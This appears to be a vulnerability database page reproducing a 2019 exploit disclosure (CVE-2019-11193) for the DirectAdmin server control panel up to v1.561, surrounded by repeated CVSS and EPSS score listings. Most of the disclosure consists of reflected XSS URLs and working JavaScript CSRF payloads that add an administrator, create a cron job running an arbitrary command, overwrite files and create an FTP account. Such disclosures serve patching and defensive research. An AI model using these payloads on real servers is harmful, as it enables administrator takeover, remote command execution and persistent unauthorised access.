InfinitumITEDB-ID:46694DirectAdmin 1.561 - Multiple Vulnerabilities
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
75.4%
# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561
# Date: 12.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.directadmin.com/
# Version: Up to v1.561.
# CVE: CVE-2019-11193
# [email protected] && infinitumit.com.tr
# Description:
# Multiple security vulnerabilities has been discovered in popular server control panel DirectAdmin, by
# InfinitumIT. Attackers can combine those security vulnerabilities and do a lot of critical action like server control takeover.
# Those vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) may cause them to happen:
# Add administrator, execute command remote (RCE), Full Backup the Server and Upload the Own Server, webshell upload and more.
# Reflected XSS Vulnerabilities:
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD
# Example Payloads:
# Add Administrator:
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
l=test%40test.com&passwd=password&passwd2=password¬ify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Remote Command Execution by Cron Jobs:
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
var params =
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Edit File:
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Create FTP Account:
var url = "http://SERVERIP:2222/CMD_FTP";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
stom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...Related
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
75.4%